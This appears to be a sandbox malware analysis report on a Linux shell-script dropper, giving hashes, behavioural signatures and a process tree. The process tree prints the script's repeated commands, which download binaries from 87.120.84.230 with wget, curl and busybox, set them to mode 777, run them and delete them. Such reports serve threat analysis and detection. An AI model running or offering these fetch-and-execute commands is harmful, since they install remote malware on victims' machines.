Analysis
-
max time kernel
27s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28/10/2024, 02:01
Static task
static1
Behavioral task
behavioral1
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
-
Size
10KB
-
MD5
688ca450547096f076169e59bab218e1
-
SHA1
2187af4719b3b2f94b20e5e3ad20b8222bc077ac
-
SHA256
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127
-
SHA512
4b9aa7e6693587d69eb70d43f25242123a62a6acd4b0c3bedd1533f2afb49f99d44f26bb6c17dbcf9ca11f2d689e80cccb1df2447fa39a4541d82c23b2c13b0c
-
SSDEEP
192:2e6/8cxOOD6Ock1sDEQ9OuNUMEQ9Oure6/8cbOOD6O9:2e6/8cxOOD6Ock1sDEQ9OuNUMEQ9OurZ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1505 chmod 1547 chmod 1649 chmod 1499 chmod 1535 chmod 1625 chmod 1613 chmod 1637 chmod 1655 chmod 1517 chmod 1529 chmod 1559 chmod 1601 chmod 1607 chmod 1511 chmod 1541 chmod 1565 chmod 1595 chmod 1493 chmod 1571 chmod 1583 chmod 1577 chmod 1619 chmod 1631 chmod 1643 chmod 1523 chmod 1553 chmod 1589 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH 1494 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF 1500 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG 1506 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS 1512 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj 1518 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c 1524 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk 1530 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN 1536 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v 1542 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb 1548 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I 1554 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 1560 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc 1566 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa 1572 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 1578 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN 1584 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v 1590 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb 1596 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I 1602 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc 1608 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa 1614 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj 1620 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH 1626 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF 1632 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG 1638 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS 1644 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c 1650 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk 1656 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG curl File opened for modification /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN curl File opened for modification /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS curl File opened for modification /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb curl File opened for modification /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN curl File opened for modification /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa curl File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF curl File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH curl File opened for modification /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk curl File opened for modification /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS curl File opened for modification /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 curl File opened for modification /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc curl File opened for modification /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj curl File opened for modification /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa curl File opened for modification /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 curl File opened for modification /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c curl File opened for modification /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc curl File opened for modification /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I curl File opened for modification /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c curl File opened for modification /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I curl File opened for modification /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v curl File opened for modification /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj curl File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH curl File opened for modification /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk curl File opened for modification /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v curl File opened for modification /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb curl File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF curl File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG curl
Processes
-
/tmp/005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh/tmp/005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh1⤵PID:1484
-
/bin/rm/bin/rm bins.sh2⤵PID:1485
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:1486
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Writes file to tmp directory
PID:1491
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:1492
-
-
/bin/chmodchmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- File and Directory Permissions Modification
PID:1493
-
-
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Executes dropped EXE
PID:1494
-
-
/bin/rmrm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:1495
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:1496
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Writes file to tmp directory
PID:1497
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:1498
-
-
/bin/chmodchmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- File and Directory Permissions Modification
PID:1499
-
-
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Executes dropped EXE
PID:1500
-
-
/bin/rmrm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:1501
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:1502
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Writes file to tmp directory
PID:1503
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:1504
-
-
/bin/chmodchmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- File and Directory Permissions Modification
PID:1505
-
-
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Executes dropped EXE
PID:1506
-
-
/bin/rmrm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:1507
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:1508
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Writes file to tmp directory
PID:1509
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:1510
-
-
/bin/chmodchmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- File and Directory Permissions Modification
PID:1511
-
-
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Executes dropped EXE
PID:1512
-
-
/bin/rmrm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:1513
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:1514
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Writes file to tmp directory
PID:1515
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:1516
-
-
/bin/chmodchmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- File and Directory Permissions Modification
PID:1517
-
-
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Executes dropped EXE
PID:1518
-
-
/bin/rmrm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:1519
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:1520
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Writes file to tmp directory
PID:1521
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:1522
-
-
/bin/chmodchmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Executes dropped EXE
PID:1524
-
-
/bin/rmrm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:1525
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:1526
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:1528
-
-
/bin/chmodchmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Executes dropped EXE
PID:1530
-
-
/bin/rmrm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:1531
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:1532
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:1534
-
-
/bin/chmodchmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:1537
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:1538
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:1540
-
-
/bin/chmodchmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:1543
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:1544
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:1546
-
-
/bin/chmodchmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:1549
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:1550
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:1552
-
-
/bin/chmodchmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Executes dropped EXE
PID:1554
-
-
/bin/rmrm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:1555
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:1556
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:1558
-
-
/bin/chmodchmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Executes dropped EXE
PID:1560
-
-
/bin/rmrm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:1561
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:1562
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:1564
-
-
/bin/chmodchmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Executes dropped EXE
PID:1566
-
-
/bin/rmrm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:1567
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:1568
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:1570
-
-
/bin/chmodchmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:1573
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:1574
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:1576
-
-
/bin/chmodchmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:1579
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:1580
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:1582
-
-
/bin/chmodchmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Executes dropped EXE
PID:1584
-
-
/bin/rmrm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:1585
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:1586
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:1588
-
-
/bin/chmodchmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Executes dropped EXE
PID:1590
-
-
/bin/rmrm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:1591
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:1592
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:1594
-
-
/bin/chmodchmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Executes dropped EXE
PID:1596
-
-
/bin/rmrm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:1597
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:1598
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:1600
-
-
/bin/chmodchmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Executes dropped EXE
PID:1602
-
-
/bin/rmrm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:1603
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:1604
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Writes file to tmp directory
PID:1605
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:1606
-
-
/bin/chmodchmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- File and Directory Permissions Modification
PID:1607
-
-
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Executes dropped EXE
PID:1608
-
-
/bin/rmrm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:1609
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:1610
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:1612
-
-
/bin/chmodchmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- File and Directory Permissions Modification
PID:1613
-
-
/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Executes dropped EXE
PID:1614
-
-
/bin/rmrm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:1615
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:1616
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Writes file to tmp directory
PID:1617
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:1618
-
-
/bin/chmodchmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Executes dropped EXE
PID:1620
-
-
/bin/rmrm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:1621
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:1622
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Writes file to tmp directory
